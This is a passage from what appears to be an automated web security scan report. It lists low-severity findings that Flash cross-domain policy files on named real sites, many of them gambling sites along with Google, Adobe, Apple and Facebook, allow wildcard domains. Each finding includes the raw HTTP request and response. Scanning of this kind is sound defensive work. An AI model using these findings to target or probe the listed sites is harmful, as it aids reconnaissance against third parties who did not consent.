Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: sv.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:03:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=me0scu552iqdw3nie0qmefj3; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.111. http://sv.crazyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://sv.crazyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: sv.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 08:48:46 GMT
Accept-Ranges: bytes
ETag: "e6c238448b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:45:23 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="crazyscratch.com" />
   <allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.112. http://sv.karamba.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://sv.karamba.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: sv.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cevewj45iuk45jzrit52fpvz; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.113. http://sv.scratch2cash.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://sv.scratch2cash.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: sv.scratch2cash.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=44lp5f45g1dakvn4mpooxjv2; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.114. http://sv.scratchcardheaven.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://sv.scratchcardheaven.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: sv.scratchcardheaven.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:13:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rozjyjqwnc4age55tgeyit45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.115. http://svenskalotter.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://svenskalotter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: svenskalotter.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=scu5ro45cuuccb55o2c5o0i1; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.116. http://video.google.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://video.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: video.google.com

Response

HTTP/1.0 200 OK
Date: Fri, 13 May 2011 19:18:03 GMT
Expires: Sat, 12 May 2012 19:18:03 GMT
X-Content-Type-Options: nosniff
Content-Type: text/x-cross-domain-policy
Last-Modified: Sat, 09 Apr 2011 00:14:17 GMT
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 235056

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s.ytimg.com" />
<allow-access-from domain="*.youtube.com" />
...[SNIP]...

4.117. http://www.adobe.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adobe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adobe.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 12 Jan 2011 18:55:31 GMT
ETag: "144-bec64ec0"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Mon, 16 May 2011 14:18:48 GMT
Keep-Alive: timeout=5, max=500
Content-Type: text/x-cross-domain-policy
Connection: close
Date: Mon, 16 May 2011 12:12:42 GMT
Age: 25
Content-Length: 324

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="by-content-type"/>
   <allow-access-from domain="*.macromedia.com" />
   <allow-access-from domain="*.adobe.com" />
   <allow-access-from domain="*.photoshop.com" />
   <allow-access-from domain="*.acrobat.com" />
...[SNIP]...

4.118. http://www.apple.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT
ETag: "8d-3f8918f48ef00"
Server: Apache/2.2.3 (Oracle)
X-N: S
X-Cached-Time: Mon, 21 Mar 2011 16:49:30 GMT
nnCoection: close
Content-Type: application/xml
Content-Length: 141
Cache-Control: max-age=179
Expires: Mon, 16 May 2011 12:28:06 GMT
Date: Mon, 16 May 2011 12:25:07 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="wdirect.apple.com" />
<allow-access-from domain="*.apple.com" />
</cross-domain-policy>

4.119. http://www.bigmoneyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:41:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=tpvchn45bnqsxc45rljjujq2; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.120. http://www.crazyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.crazyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.crazyscratch.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: text/xml
Last-Modified: Mon, 03 May 2010 07:05:08 GMT
Accept-Ranges: bytes
ETag: "2634e3f68eeaca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:41:28 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="crazyscratch.com" />
   <allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.121. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.122.38
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

4.122. http://www.hopa.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hopa.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hopa.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:41:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ukyabx45wh2cfxiqewji3e45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.123. http://www.info.crazyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.info.crazyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:41:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cq0fyp45txhjecif42orps55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.124. http://www.info.winnings.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.info.winnings.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.info.winnings.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:41:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=c1tpkpek4vg34fvqv43ze155; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.125. http://www.karamba.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:42:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=tsfv4k55mykvwh55l4ikkg55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.126. http://www.maestrocard.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.maestrocard.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.maestrocard.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:24:07 GMT
Server: Apache
Last-Modified: Fri, 01 Oct 2010 08:45:01 GMT
ETag: "183-35cd3d40"
Accept-Ranges: bytes
Content-Length: 387
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.mastercard.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mastercardbusiness.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.priceless.com" secure="false"/>
...[SNIP]...

4.127. http://www.mundirasca.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mundirasca.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:41:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5onbqbybv3buvyysplg5rsbe; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.128. http://www.pclscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pclscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pclscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
